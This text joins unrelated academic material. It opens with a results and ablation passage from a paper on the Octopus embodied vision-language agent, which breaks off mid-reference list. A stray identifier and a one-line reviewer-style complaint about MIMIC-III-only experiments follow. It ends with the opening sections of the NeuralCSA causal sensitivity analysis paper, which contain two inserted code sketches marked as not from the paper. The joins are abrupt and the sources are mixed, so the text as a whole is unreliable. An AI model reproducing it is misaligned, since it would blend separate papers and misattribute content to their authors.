**CodeLLaMA Improves Coding but not Planning.** The first two rows in Table 2 highlight the suboptimal task completion rate of the blind LLMs. Among them, CodeLLaMA benefits from pre-training on a large programming dataset, resulting in a notable enhancement in code execution: in our observation, 92% of its written code executes successfully, compared to LLaMA's 24%. However, its prowess in planning remains limited. In contrast, the proposed Octopus MPT-7B model displays superior planning and task completion metrics while maintaining commendable coding abilities (72% of the written code can be executed). We surmise that the coding requirements within the OctoGibson environment might not be exceedingly intricate, rendering an advanced programming language model like CodeLLaMA less crucial, albeit beneficial. For more insight, although not shown in the table, our efforts to replace the MPT model with CodeLLaMA encountered challenges with nonsensical outputs, suggesting that more refined code, or image-code paired data, might be necessary for a successful Octopus-CodeLLaMA integration.

**Blind LLMs Struggle with Extended Input Content.** Our observations indicate that the step-level TAPA model, when supplied with a ground-truth object list, achieves a notable enhancement in planning. The primary distinction between it and the blind CodeLLaMA lies in the input length; the latter deals with protracted, pairwise relation content, complicating the language model's ability to extract crucial data from the environment message. This scenario highlights the inherent limitation of blind LLMs: relying on language alone to convey the entirety of environmental data can result in unwieldy and less informative input.

**Octopus Demonstrates Superior Task Generalization.** Table 2 underscores Octopus's commendable performance, evidencing its consistent edge over standalone language models in task completion. Its adeptness in adapting to previously unencountered environments underlines the inherent advantages of vision-language models. A more detailed ablation analysis is provided in the subsequent section.

**RLEF Enhances Octopus's Planning Strategy.** Table 2 unequivocally underscores Octopus's improved reasoning capabilities after RLEF finetuning. An example can be observed in Figure A1 (b-c), where, after refinement via RLEF, Octopus astutely navigates to the cabinet housing the carboy instead of attempting a direct yet distant capture. Quantitatively, Octopus exhibits enhanced adaptability to previously unseen reasoning tasks, reinforcing its prowess in logical task resolution. When juxtaposed with other strategies, such as the embodied queries employed by EmbodiedGPT, RLEF emerges as the more efficacious approach.

Figure 5: Ablation study on model components, model size, and vision input. For bars with different colors, the upper bar denotes the number of successful reasoning tasks, and the lower one routine tasks.

5.2 ABLATION STUDY

**7B v.s. 3B Model Size** We embarked on experiments centered on model size to discern the influence of the total parameter count on the efficacy of vision-language models. As illustrated in Figure 5 (a), downsizing the model manifests in a noticeable performance drop. The congruency of results across both the SFT and RLEF models underscores the importance of an apt model size when sculpting vision-language models.

**Examining Training Components** Through experimentation on training components, we aimed to illuminate optimal strategies for finetuning vision-language models. Figure 5 (b) demonstrates that solely adjusting the connector culminates in success for merely 4 out of 60 tasks. Conversely, finetuning both the connector and language decoder nudges the success rate slightly higher, with 5 tasks being accomplished. In contrast to the fully optimized model, these outcomes accentuate the importance of which parameters are trained.
Significance of Visual Inputs in Task Performance In our standard configuration, the vision component processes a sequence of image inputs, consisting of eight circularly captured first-person view (FPV) images, complemented by two bird’s-eye view (BEV) images. With the intent to investigate the impact of visual inputs on task performance, we initiated an ablation study. In a modified setup, the sequence of these visual inputs was deliberately randomized, aiming to attenuate the strength of the visual signals. As illustrated in Figure 5 (c), this intentional disruption in visual input consistency led to a pronounced decline in task performance. This result highlights the crucial role that clear and structured visual inputs play in the Octopus model, emphasizing that it significantly leverages visual cues for effective planning and task execution. 5.3 PERFORMANCE OF GPT-4 AND GPT-4V Performance of GPT-4 The input provided to GPT-4 was consistent with the input during our data collection phase, which was purely textual. Under such conditions, out of a total of 60 test tasks, GPT-4 achieved a commendable success rate in 31 tasks. This result suggests that current models still possess considerable room for advancement. The fact that even GPT-4 doesn’t perform optimally indicates a vast scope for improvements within the domain. Performance of GPT-4V Though we couldn’t extensively test GPT-4V due to API limitations, our sample case indicates its ability to generate code on par with Octopus when provided with image-based environment messages. However, while Octopus, having been trained in the present environment, adeptly performs tasks like “open the cabinet”, GPT-4V’s actions, shown in Figure A1 (e), although seemingly accurate, fall short in specific tasks such as locating the target object - the carboy. Given GPT-4V’s zero-shot learning approach and its unfamiliarity with our environment, alongside potential simulator discrepancies, its results remain commendable. 5.4 TRANSFERABILITY ON GTA TASKS To examine Octopus’s adaptability in novel environments, we transitioned the model initially trained on OctoGibson to tasks within the GTA framework. We observed that even in a few-shot scenario, Octopus demonstrates commendable performance and can complete 4 out of the 11 test tasks. REFERENCES Grand theft auto v, 2014. Michael Ahn, Anthony Brohan, Noah Brown, Yevgen Chebotar, Omar Cortes, Byron David, Chelsea Finn, Chuyuan Fu, Keerthana Gopalakrishnan, Karol Hausman, Alex Herzog, Daniel Ho, Jasmine Hsu, Julian Ibarz, Brian Ichter, Alex Irpan, Eric Jang, Rosario Jauregui Ruano, Kyle Jeffrey, Sally Jesmonth, Nikhil Joshi, Ryan Julian, Dmitry Kalashnikov, Yuheng Kuang, Kuang-Huei Lee, Sergey Levine, Yao Lu, Linda Luu, Carolina Parada, Peter Pastor, Jornell Quiambao, Kanishka Rao, Jarek Rettinghouse, Diego Reyes, Pierre Sermanet, Nicolas Sievers, Clayton Tan, Alexander Toshev, Vincent Vanhoucke, Fei Xia, Ted Xiao, Peng Xu, Sichun Xu, Mengyuan Yan, and Andy Zeng. Do as i can and not as i say: Grounding language in robotic affordances. In arXiv preprint arXiv:2204.01691, 2022. Jean-Baptiste Alayrac, Jeff Donahue, Pauline Luc, Antoine Miech, Iain Barr, Yana Hasson, Karel Lenc, Arthur Mensch, Katherine Millican, Malcolm Reynolds, et al. Flamingo: a visual language model for few-shot learning. Advances in Neural Information Processing Systems, 35:23716–23736, 2022. 
Anas Awadalla, Irena Gao, Josh Gardner, Jack Hessel, Yusuf Hanafy, Wanrong Zhu, Kalyani Marathe, Yonatan Bitton, Samir Gadre, Shiori Sagawa, Jenia Jitsev, Simon Kornblith, Pang Wei Koh, Gabriel Ilharco, Mitchell Wortsman, and Ludwig Schmidt. Openflamingo: An open-source framework for training large autoregressive vision-language models. arXiv preprint arXiv:2308.01390, 2023. Greg Brockman, Vicki Cheung, Ludwig Pettersson, Jonas Schneider, John Schulman, Jie Tang, and Wojciech Zaremba. Openai gym. arXiv preprint arXiv:1606.01540, 2016. Anthony Brohan, Noah Brown, Justice Carbajal, Yevgen Chebotar, Xi Chen, Krzysztof Choromanski, Tianli Ding, Danny Driess, Avinava Dubey, Chelsea Finn, et al. Rt-2: Vision-language-action models transfer web knowledge to robotic control. arXiv preprint arXiv:2307.15818, 2023. Tom Brown, Benjamin Mann, Nick Ryder, Melanie Subbiah, Jared D Kaplan, Prafulla Dhariwal, Arvind Neelakantan, Pranav Shyam, Girish Sastry, Amanda Askell, et al. Language models are few-shot learners. Advances in neural information processing systems, 33:1877–1901, 2020. Angel Chang, Angela Dai, Thomas Funkhouser, Maciej Halber, Matthias Niessner, Manolis Savva, Shuran Song, Andy Zeng, and Yinda Zhang. Matterport3d: Learning from rgb-d data in indoor environments. arXiv preprint arXiv:1709.06158, 2017. Liangyu Chen, Bo Li, Sheng Shen, Jingkang Yang, Chunyuan Li, Kurt Keutzer, Trevor Darrell, and Ziwei Liu. Language models are visual reasoning coordinators. In ICLR 2023 Workshop on Mathematical and Empirical Understanding of Foundation Models, 2023. Wei-Lin Chiang, Zhuohan Li, Zi Lin, Ying Sheng, Zhanghao Wu, Hao Zhang, Lianmin Zheng, Siyuan Zhuang, Yonghao Zhuang, Joseph E Gonzalez, et al. Vicuna: An open-source chatbot impressing gpt-4 with 90%* chatgpt quality. See https://vicuna.lmsys.org (accessed 14 April 2023), 2023. Wenliang Dai, Junnan Li, Dongxu Li, Anthony Meng Huat Tiong, Junqi Zhao, Weisheng Wang, Boyang Li, Pascale Fung, and Steven Hoi. Instructblip: Towards general-purpose vision-language models with instruction tuning. arXiv preprint arXiv:2305.06500, 2023. Danny Driess, Fei Xia, Mehdi S. M. Sajjadi, Corey Lynch, Aakanksha Chowdhery, Brian Ichter, Ayyaan Wahid, Jonathan Tompson, Quan Vuong, Tianhe Yu, Wenlong Huang, Yevgen Chebotar, Pierre Sermanet, Daniel Duckworth, Sergey Levine, Vincent Vanhoucke, Karol Hausman, Marc Toussaint, Klaus Greff, Andy Zeng, Igor Mordatch, and Pete Florence. Palm-e: An embodied multimodal language model. In arXiv preprint arXiv:2303.03378, 2023. Haoyuan Fu, Wenqiang Xu, Ruolin Ye, Han Xue, Zhenjun Yu, Tutian Tang, Yutong Li, Wenxin Du, Jieyi Zhang, and Cewu Lu. Rfuniverse: A multiphysics simulation platform for embodied ai, 2023.
ikX6D1oM1c
The experiments, to some extent, appear to be lacking in comprehensiveness. The semi-synthetic datasets utilized in this study are exclusively derived from the MIMIC-III dataset. The findings derived from this single source may not offer an adequate illustration of the model's performance.
A NEURAL FRAMEWORK FOR GENERALIZED CAUSAL SENSITIVITY ANALYSIS

Dennis Frauen¹,²,⁶ Fergus Imrie³ Alicia Curth⁴ Valentyn Melnychuk¹,² Stefan Feuerriegel¹,² Mihaela van der Schaar⁴,⁵

ABSTRACT

Unobserved confounding is common in many applications, making causal inference from observational data challenging. As a remedy, causal sensitivity analysis is an important tool to draw causal conclusions under unobserved confounding with mathematical guarantees. In this paper, we propose NEURALCSA, a neural framework for generalized causal sensitivity analysis. Unlike previous work, our framework is compatible with (i) a large class of sensitivity models, including the marginal sensitivity model, $f$-sensitivity models, and Rosenbaum's sensitivity model; (ii) different treatment types (i.e., binary and continuous); and (iii) different causal queries, including (conditional) average treatment effects and simultaneous effects on multiple outcomes. The generality of NEURALCSA is achieved by learning a latent distribution shift corresponding to a treatment intervention using two conditional normalizing flows. We provide theoretical guarantees that NEURALCSA can infer valid bounds on the causal query of interest and also demonstrate this empirically using both simulated and real-world data.

1 INTRODUCTION

Causal inference from observational data is central to many fields such as medicine (Frauen et al., 2023a; Feuerriegel et al., 2024), economics (Imbens & Angrist, 1994), and marketing (Varian, 2016). However, the presence of unobserved confounding often renders causal inference challenging (Pearl, 2009). As an example, consider an observational study examining the effect of smoking on lung cancer risk, where potential confounders, such as genetic factors influencing smoking behavior and cancer risk (Erzurumluoglu et al., 2020), are not observed. Then, the causal relationship is not identifiable, and point identification without additional assumptions is impossible (Pearl, 2009).

Causal sensitivity analysis offers a remedy by moving from point identification to partial identification. To do so, approaches for causal sensitivity analysis first impose assumptions on the strength of unobserved confounding through so-called sensitivity models (Rosenbaum, 1987; Imbens, 2003) and then obtain bounds on the causal query of interest. Such bounds often provide the insight that the causal quantities cannot reasonably be explained away by unobserved confounding, which is sufficient for consequential decision-making in many applications (Kallus et al., 2019).

Existing works on causal sensitivity analysis can be loosely grouped by problem setting. These vary across (1) sensitivity models, such as the marginal sensitivity model (MSM) (Tan, 2006), $f$-sensitivity models (Jin et al., 2022), and Rosenbaum's sensitivity model (Rosenbaum, 1987); (2) treatment type (i.e., binary and continuous); and (3) the causal query of interest. Causal queries may include (conditional) average treatment effects (CATE), but also distributional effects or simultaneous effects on multiple outcomes. Existing works typically focus on a specific sensitivity model, treatment type, and causal query (Table 1). However, none is applicable to all settings within (1)–(3).
¹ LMU Munich  ² Munich Center for Machine Learning  ³ UCLA  ⁴ University of Cambridge  ⁵ Alan Turing Institute  ⁶ Corresponding author ([email protected])

To fill this gap, we propose NEURALCSA, a neural framework for causal sensitivity analysis that is applicable to numerous sensitivity models, treatment types, and causal queries, including multiple-outcome settings. For this, we define a large class of sensitivity models, which we call generalized treatment sensitivity models (GTSMs). GTSMs include common sensitivity models such as the MSM, $f$-sensitivity models, and Rosenbaum's sensitivity model. The intuition behind GTSMs is as follows: when intervening on the treatment $A$, the $U \rightarrow A$ edge is removed in the corresponding causal graph, which leads to a distribution shift in the latent confounders $U$ (see Fig. 1). GTSMs then impose restrictions on this latent distribution shift, which correspond to assumptions on the "strength" of unobserved confounding.

Figure 1: Idea behind NEURALCSA to learn the latent distribution shift due to a treatment intervention. Orange nodes denote observed (random) variables. Blue nodes denote unobserved variables pre-intervention. Green nodes indicate unobserved variables post-intervention under a GTSM $\mathcal{M}$. Observed confounders $X$ are omitted for simplicity.

NEURALCSA is compatible with any sensitivity model that can be written as a GTSM. This is crucial in practical applications, where sensitivity models correspond to different assumptions on the data-generating process and may lead to different results (Yin et al., 2022). To achieve this, NEURALCSA learns the latent distribution shift in the unobserved confounders from Fig. 1 using two separately trained conditional normalizing flows (CNFs). This is different from previous works on causal sensitivity analysis, which do not provide a unified approach across numerous sensitivity models, treatment types, and causal queries. We provide theoretical guarantees that NEURALCSA learns valid bounds on the causal query of interest and demonstrate this empirically.

Our contributions are: (1) We define a general class of sensitivity models, called GTSMs. (2) We propose NEURALCSA, a neural framework for causal sensitivity analysis under any GTSM. NEURALCSA is compatible with various sensitivity models, treatment types, and causal queries. In particular, NEURALCSA is applicable in settings for which bounds are not analytically tractable and no solutions exist yet. (3) We provide theoretical guarantees that NEURALCSA learns valid bounds on the causal query of interest and demonstrate the effectiveness of our framework empirically.

2 RELATED WORK

In the following, we provide an overview of related literature on partial identification and causal sensitivity analysis. A more detailed overview, including literature on point identification and estimation, can be found in Appendix A.

Partial identification: The aim of partial identification is to compute bounds on causal queries whenever point identification is not possible, such as under unobserved confounding (Manski, 1990). There are several literature streams that impose different assumptions on the data-generating process in order to obtain informative bounds. One stream addresses partial identification for general causal graphs with discrete variables (Duarte et al., 2023).
Another stream assumes the existence of valid instrumental variables (Gunsilius, 2020; Kilbertus et al., 2020). Recently, there has been a growing interest in using neural networks for partial identification (Xia et al., 2021; 2023; Padh et al., 2023). However, none of these methods allow for incorporating sensitivity models and sensitivity analysis.

Table 1: Overview of key settings for causal sensitivity analyses and whether covered by existing literature (✓) or not (×). Treatments are either binary or continuous. Details are in Appendix A.

| Causal query | MSM† | \( f \)-sensitivity | Rosenbaum |
|---|---|---|---|
| CATE (binary) | ✓ | ✓ | ✓ |
| CATE (cont.) | × | × | × |
| Distributional effects | ✓ | ✓ | ✓ |
| Interventional density | ✓ | (✓) | × |
| Multiple outcomes | × | × | × |

† The MSM for continuous treatments is also called the continuous MSM (CMSM) (Jesson et al., 2022).

⁷ Code is available at https://github.com/DennisFrauen/NeuralCSA

Causal sensitivity analysis: Causal sensitivity analysis addresses the partial identification of causal queries by imposing assumptions on the strength of unobserved confounding via sensitivity models. It dates back to Cornfield et al. (1959), who showed that unobserved confounding could not reasonably explain away the observed effect of smoking on lung cancer risk. Existing works can be grouped along three dimensions: (1) the sensitivity model, (2) the treatment type, and (3) the causal query of interest (see Table 1; details in Appendix A). Popular sensitivity models include Rosenbaum's sensitivity model (Rosenbaum, 1987), the marginal sensitivity model (MSM) (Tan, 2006), and \( f \)-sensitivity models (Jin et al., 2022). Here, most methods have been proposed for binary treatments and conditional average treatment effects (Kallus et al., 2019; Zhao et al., 2019; Jesson et al., 2021; Dorn & Guo, 2022; Dorn et al., 2022; Oprescu et al., 2023). Extensions under the MSM have been proposed for continuous treatments (Jesson et al., 2022; Marmarelis et al., 2023a) and individual treatment effects (Yin et al., 2022; Jin et al., 2023; Marmarelis et al., 2023b). However, approaches for many settings are still missing (shown by × in Table 1). In an attempt to generalize causal sensitivity analysis, Frauen et al. (2023b) provided bounds for different treatment types (i.e., binary, continuous) and causal queries (e.g., CATE and distributional effects, but not multiple outcomes). Yet, the results are limited to MSM-type sensitivity models. To the best of our knowledge, no previous work proposes a unified solution for obtaining bounds under various sensitivity models (e.g., MSM, \( f \)-sensitivity, Rosenbaum's), treatment types (i.e., binary and continuous), and causal queries (e.g., CATE, distributional effects, interventional densities, and simultaneous effects on multiple outcomes).

3 MATHEMATICAL BACKGROUND

Notation: We denote random variables \( X \) as capital letters and their realizations \( x \) in lowercase. We further write \( P(x) \) for the probability mass function if \( X \) is discrete, and for the probability density function with respect to the Lebesgue measure if \( X \) is continuous. Conditional probability mass functions/densities \( P(Y = y \mid X = x) \) are written as \( P(y \mid x) \). Finally, we denote the conditional distribution of \( Y \mid X = x \) as \( P(Y \mid x) \) and its expectation as \( E[Y \mid x] \).
3.1 PROBLEM SETUP

Data-generating process: We consider the standard setting for (static) treatment effect estimation under unobserved confounding (Dorn & Guo, 2022). That is, we have observed confounders \( X \in \mathcal{X} \subseteq \mathbb{R}^{d_x} \), unobserved confounders \( U \in \mathcal{U} \subseteq \mathbb{R}^{d_u} \), treatments \( A \in \mathcal{A} \subseteq \mathbb{R}^{d_a} \), and outcomes \( Y \in \mathcal{Y} \subseteq \mathbb{R}^{d_y} \). Note that we allow for (multiple) discrete or continuous treatments and multiple outcomes, i.e., \( d_a, d_y \geq 1 \). The underlying causal graph is shown in Fig. 2. We have access to an observational dataset \( D = (x_i, a_i, y_i)_{i=1}^n \) sampled i.i.d. from the observational distribution \( (X, A, Y) \sim P_{\text{obs}} \). The full distribution \( (X, U, A, Y) \sim P \) is unknown. We use the potential outcomes framework to formalize the causal inference problem (Rubin, 1974) and denote \( Y(a) \) as the potential outcome when intervening on the treatment and setting it to \( A = a \). We impose the following standard assumptions (Dorn & Guo, 2022).

Assumption 1. We assume that for all \( x \in \mathcal{X} \) and \( a \in \mathcal{A} \) the following three conditions hold: (i) \( A = a \) implies \( Y(a) = Y \) (consistency); (ii) \( P(a \mid x) > 0 \) (positivity); and (iii) \( Y(a) \perp\!\!\!\perp A \mid X, U \) (latent unconfoundedness).

Causal queries: We are interested in a wide range of general causal queries. We formalize them as functionals \( Q(x, a, P) = F(P(Y(a) \mid x)) \), where \( F \) is a functional that maps the potential outcome distribution \( P(Y(a) \mid x) \) to a real number (Frauen et al., 2023b). Thereby, we cover various queries from the causal inference literature. For example, by setting \( F = E[\cdot] \), we obtain the conditional expected potential outcomes / dose-response curves \( Q(x, a, P) = E[Y(a) \mid x] \). We can also obtain distributional versions of these queries by setting \( F \) to a quantile instead of the expectation. Furthermore, our methodology also applies to queries that can be obtained by averaging or taking differences. For binary treatments \( A \in \{0, 1\} \), the query \( \tau(x) = E[Y(1) \mid x] - E[Y(0) \mid x] \) is called the conditional average treatment effect (CATE), and its averaged version \( \int \tau(x) P(x) \, dx \) the average treatment effect (ATE).

Our formalization also covers simultaneous effects on multiple outcomes (i.e., \( d_y \geq 2 \)): consider the query \( Q(x, a, P) = P(Y(a) \in S \mid x) \), which is the probability that the outcome \( Y(a) \) is contained in some set \( S \subseteq \mathcal{Y} \) after intervening on the treatment. For example, consider two potential outcomes \( Y_1(a) \) and \( Y_2(a) \) denoting blood pressure and heart rate, respectively. We then might be interested in \( P(Y_1(a) \leq t_1, Y_2(a) \leq t_2 \mid x) \), where \( t_1 \) and \( t_2 \) are critical threshold values (see Sec. 6).

3.2 CAUSAL SENSITIVITY ANALYSIS

Causal sensitivity analysis builds upon sensitivity models that restrict the possible strength of unobserved confounding (e.g., Rosenbaum & Rubin, 1983a). Formally, we define a sensitivity model as a family of distributions of \( (X, U, A, Y) \) that induce the observational distribution \( P_{\text{obs}} \).

**Definition 1.** A sensitivity model \( M \) is a family of probability distributions \( P \) defined on \( \mathcal{X} \times \mathcal{U} \times \mathcal{A} \times \mathcal{Y} \) for arbitrary finite-dimensional \( \mathcal{U} \) so that \( \int_{\mathcal{U}} P(x, u, a, y) \, du = P_{\text{obs}}(x, a, y) \) for all \( P \in M \).
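To make the query formalization concrete, the following minimal sketch (our illustration, not from the paper; NumPy only, with hypothetical function names) evaluates three choices of the functional \( F \) on Monte Carlo samples from a potential-outcome distribution \( P(Y(a) \mid x) \):

```python
import numpy as np

def query_mean(samples: np.ndarray) -> float:
    """F = E[.]: conditional expected potential outcome / dose-response."""
    return float(samples.mean())

def query_quantile(samples: np.ndarray, q: float = 0.5) -> float:
    """F = q-quantile: a distributional version of the query."""
    return float(np.quantile(samples, q))

def query_set_probability(samples: np.ndarray, thresholds: np.ndarray) -> float:
    """F = P(Y(a) in S | x) for S = {y : y_k >= t_k for all k} (multiple outcomes)."""
    return float((samples >= thresholds).all(axis=-1).mean())

# Toy example: 10,000 draws of a two-dimensional potential outcome Y(a) | x.
rng = np.random.default_rng(0)
y_samples = rng.normal(loc=[100.0, 80.0], scale=[15.0, 10.0], size=(10_000, 2))

print(query_mean(y_samples[:, 0]))                                # E[Y_1(a) | x]
print(query_quantile(y_samples[:, 0], q=0.9))                     # 90% quantile
print(query_set_probability(y_samples, np.array([115.0, 90.0])))  # joint exceedance
```

The last query mirrors the multiple-outcome example above, here with joint exceedance of the two thresholds rather than staying below them.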
**Task:** Given a sensitivity model \( M \) and an observational distribution \( P_{\text{obs}} \), the aim of causal sensitivity analysis is to solve the partial identification problem

\[ Q^+_M(x, a) = \sup_{P \in M} Q(x, a, P) \quad \text{and} \quad Q^-_M(x, a) = \inf_{P \in M} Q(x, a, P). \quad (1) \]

By definition, the interval \([Q^-_M(x, a), Q^+_M(x, a)]\) is the tightest interval that is guaranteed to contain the ground-truth causal query \( Q(x, a, P) \) while satisfying the sensitivity constraints. We can also obtain bounds for averaged causal queries and differences via \( \int Q^+_M(x, a) P(x) \, dx \) and \( Q^+_M(x, a_1) - Q^-_M(x, a_2) \) (see Appendix D for details).

**Sensitivity models from the literature:** We now recap three types of prominent sensitivity models from the literature, namely, the MSM, \( f \)-sensitivity models, and Rosenbaum's sensitivity model. These are designed for binary treatments \( A \in \{0, 1\} \). To formalize them, we first define the odds ratio \( \text{OR}(a, b) = \frac{a}{1-a} \cdot \frac{1-b}{b} \), the observed propensity score \( \pi(x) = P(A = 1 \mid x) \), and the full propensity score \( \pi(x, u) = P(A = 1 \mid x, u) \). Then, the definitions are:

1. The marginal sensitivity model (MSM) (Tan, 2006) is defined as the family of all \( P \) that satisfy \( \frac{1}{\Gamma} \leq \text{OR}(\pi(x), \pi(x, u)) \leq \Gamma \) for all \( x \in \mathcal{X} \) and \( u \in \mathcal{U} \) and a sensitivity parameter \( \Gamma \geq 1 \).
2. \( f \)-sensitivity models (Jin et al., 2022) build upon a given convex function \( f : \mathbb{R}_{>0} \to \mathbb{R} \) with \( f(1) = 0 \) and are defined via \( \max \left\{ \int_{\mathcal{U}} f(\text{OR}(\pi(x), \pi(x, u))) \, P(u \mid x, A = 1) \, du, \; \int_{\mathcal{U}} f(\text{OR}^{-1}(\pi(x), \pi(x, u))) \, P(u \mid x, A = 1) \, du \right\} \leq \Gamma \) for all \( x \in \mathcal{X} \).
3. Rosenbaum's sensitivity model (Rosenbaum, 1987) is defined via \( \frac{1}{\Gamma} \leq \text{OR}(\pi(x, u_1), \pi(x, u_2)) \leq \Gamma \) for all \( x \in \mathcal{X} \) and \( u_1, u_2 \in \mathcal{U} \).

**Interpretation and choice of \( \Gamma \):** In the above sensitivity models, the sensitivity parameter \( \Gamma \) controls the strength of unobserved confounding. Both the MSM and Rosenbaum's sensitivity model bound the odds ratio uniformly over all \( u \in \mathcal{U} \), while the \( f \)-sensitivity model bounds an integral over \( u \). We refer to Appendix C for further differences. Setting \( \Gamma = 1 \) in the above sensitivity models corresponds to unconfoundedness and thus point identification. For \( \Gamma > 1 \), point identification is not possible, and we need to solve the partial identification problem from Eq. (1) instead. In practice, one typically chooses \( \Gamma \) by domain knowledge or data-driven heuristics (Kallus et al., 2019; Hatt et al., 2022). For example, a common approach in practice is to determine the smallest \( \Gamma \) so that the partially identified interval \([Q^-_M(x, a), Q^+_M(x, a)]\) includes 0. Then, \( \Gamma \) can be interpreted as a level of "causal uncertainty", quantifying the smallest violation of unconfoundedness that would explain away the causal effect (Jesson et al., 2021; Jin et al., 2023).

---

⁸ Corresponding sensitivity models for continuous treatments can be defined by replacing the odds ratio with the density ratio \( \text{DR}(a, b) = a/b \) and the propensity scores with the densities \( P(a \mid x) \) and \( P(a \mid x, u) \) (Bonvini et al., 2022; Jesson et al., 2022).
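For intuition, the sketch below (our toy illustration; all numbers are made up) computes, for a discrete unobserved confounder, the smallest \( \Gamma \) under which a given full distribution satisfies the MSM, together with the corresponding KL \( f \)-sensitivity value:

```python
import numpy as np

def odds_ratio(a: float, b: float) -> float:
    return (a / (1.0 - a)) * ((1.0 - b) / b)

# Toy full distribution: binary U with P(u | x) and full propensities pi(x, u).
p_u = np.array([0.3, 0.7])          # P(U = u | x)
pi_xu = np.array([0.8, 0.4])        # pi(x, u) = P(A = 1 | x, u)
pi_x = float((pi_xu * p_u).sum())   # observed propensity pi(x) = P(A = 1 | x)

# MSM: 1/Gamma <= OR(pi(x), pi(x, u)) <= Gamma must hold for every u.
ors = np.array([odds_ratio(pi_x, p) for p in pi_xu])
gamma_msm = max(ors.max(), (1.0 / ors).max())   # smallest Gamma satisfying the MSM

# KL f-sensitivity with f(t) = t log t, integrating over P(u | x, A = 1).
p_u_given_a1 = pi_xu * p_u / pi_x               # Bayes: P(u | x, A = 1)
f = lambda t: t * np.log(t)
gamma_f = max((f(ors) * p_u_given_a1).sum(), (f(1.0 / ors) * p_u_given_a1).sum())

print(f"smallest MSM Gamma: {gamma_msm:.3f}, KL f-sensitivity value: {gamma_f:.3f}")
```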
We refer to Appendix C for details and further examples of sensitivity models.

4 THE GENERALIZED TREATMENT SENSITIVITY MODEL (GTSM)

We now define our generalized treatment sensitivity model (GTSM). The GTSM subsumes a large class of sensitivity models, including the MSM, \( f \)-sensitivity models, and Rosenbaum's sensitivity model.

**Motivation:** Intuitively, we define the GTSM so that it includes all sensitivity models that restrict the latent distribution shift in the confounding space due to the treatment intervention (see Fig. 1). To formalize this, we can write the observational outcome density under Assumption 1 as

\[ P_{\text{obs}}(y \mid x, a) = \int P(y \mid x, u, a) \, P(u \mid x, a) \, du, \quad (2) \]

while the potential outcome density after intervening on the treatment can be written as

\[ P(Y(a) = y \mid x) = \int P(y \mid x, u, a) \, P(u \mid x) \, du. \quad (3) \]

Eq. (2) and (3) imply that \( P_{\text{obs}}(y \mid x, a) \) and \( P(Y(a) = y \mid x) \) only differ by the densities \( P(u \mid x, a) \) and \( P(u \mid x) \) under the integrals. If the distributions \( P(U \mid x, a) \) and \( P(U \mid x) \) coincided, it would hold that \( P(Y(a) = y \mid x) = P_{\text{obs}}(y \mid x, a) \), and the potential outcome distribution would be identified. This suggests that we should define sensitivity models by measuring deviations from unconfoundedness via the shift between \( P(U \mid x, a) \) and \( P(U \mid x) \).

**Definition 2.** A generalized treatment sensitivity model (GTSM) is a sensitivity model \( M \) that contains all probability distributions \( P \) that satisfy \( D_{x,a}(P(U \mid x), P(U \mid x, a)) \leq \Gamma \) for a functional of distributions \( D_{x,a} \), a sensitivity parameter \( \Gamma \in \mathbb{R}_{\geq 0} \), and all \( x \in \mathcal{X} \) and \( a \in \mathcal{A} \).

**Lemma 1.** The MSM, the \( f \)-sensitivity model, and Rosenbaum's sensitivity model are GTSMs.

The class of all GTSMs is still too large for meaningful sensitivity analysis. This is because the sensitivity constraint may not be invariant w.r.t. transformations (e.g., scaling) of the latent space \( \mathcal{U} \).

**Definition 3 (Transformation-invariance).** A GTSM \( M \) is transformation-invariant if it satisfies \( D_{x,a}(P(U \mid x), P(U \mid x, a)) \geq D_{x,a}(P(t(U) \mid x), P(t(U) \mid x, a)) \) for any measurable function \( t : \mathcal{U} \rightarrow \tilde{\mathcal{U}} \) to another latent space \( \tilde{\mathcal{U}} \).

Transformation-invariance is necessary for meaningful sensitivity analysis because it implies that once we choose a latent space \( \mathcal{U} \) and a sensitivity parameter \( \Gamma \), we cannot find a transformation to another latent space \( \tilde{\mathcal{U}} \) so that the induced distribution on \( \tilde{\mathcal{U}} \) violates the sensitivity constraint. All sensitivity models we consider in this paper are transformation-invariant, as stated below.

**Lemma 2.** The MSM, \( f \)-sensitivity models, and Rosenbaum's sensitivity model are transformation-invariant.

5 NEURAL CAUSAL SENSITIVITY ANALYSIS

We now introduce our neural approach to causal sensitivity analysis as follows. First, we simplify the partial identification problem from Eq. (1) under a GTSM and propose a (model-agnostic) two-stage procedure (Sec. 5.1). Then, we provide theoretical guarantees for our two-stage procedure (Sec. 5.2). Finally, we instantiate our neural framework, called NeuralCSA (Sec. 5.3).

5.1 SENSITIVITY ANALYSIS UNDER A GTSM

**Motivation:** Recall that, by definition, a GTSM imposes constraints on the distribution shift in the latent confounders due to treatment intervention (Fig. 1). Our idea is to propose a two-stage procedure, where Stage 1 learns the observational distribution (Fig. 1, left),
while Stage 2 learns the shifted distribution of \( U \) after intervening on the treatment under a GTSM (Fig. 1, right). In Sec. 5.2, we will see that, under weak assumptions, learning this distribution shift in separate stages is guaranteed to lead to the bounds \( Q^+_M(x, a) \) and \( Q^-_M(x, a) \). To formalize this, we start by simplifying the partial identification problem from Eq. (1) for a GTSM \( M \).

**Simplifying Eq. (1):** We begin by rewriting Eq. (1) using the GTSM definition. Without loss of generality, we consider the upper bound \( Q^+_M(x, a) \). Recall that Eq. (1) seeks to maximize over all probability distributions that are compatible both with the observational data and with the sensitivity model. However, note that any GTSM only restricts the \( U \rightarrow A \) part of the distribution, not the \( U \rightarrow Y \) part. Hence, we can use Eq. (3) and Eq. (2) to write the upper bound as

\[ Q^+_M(x, a) = \sup_{\{P(U \mid x, a')\}_{a' \neq a}} \; \sup_{P(U \mid x, a), \, \{P(Y \mid x, u, a)\}_{u \in \mathcal{U}}} F \left( \int P(Y \mid x, u, a) \, P(u \mid x) \, du \right), \quad (4) \]

where we maximize over (families of) probability distributions \( \{P(U \mid x, a')\}_{a' \neq a} \) (left supremum) and \( P(U \mid x, a) \), \( \{P(Y \mid x, u, a)\}_{u \in \mathcal{U}} \) (right supremum). The constraint in the right supremum ensures that the respective components of the full distribution \( P \) are compatible with the observational data, while the constraints in the left supremum ensure that the respective components are compatible with both the observational data and the sensitivity model.

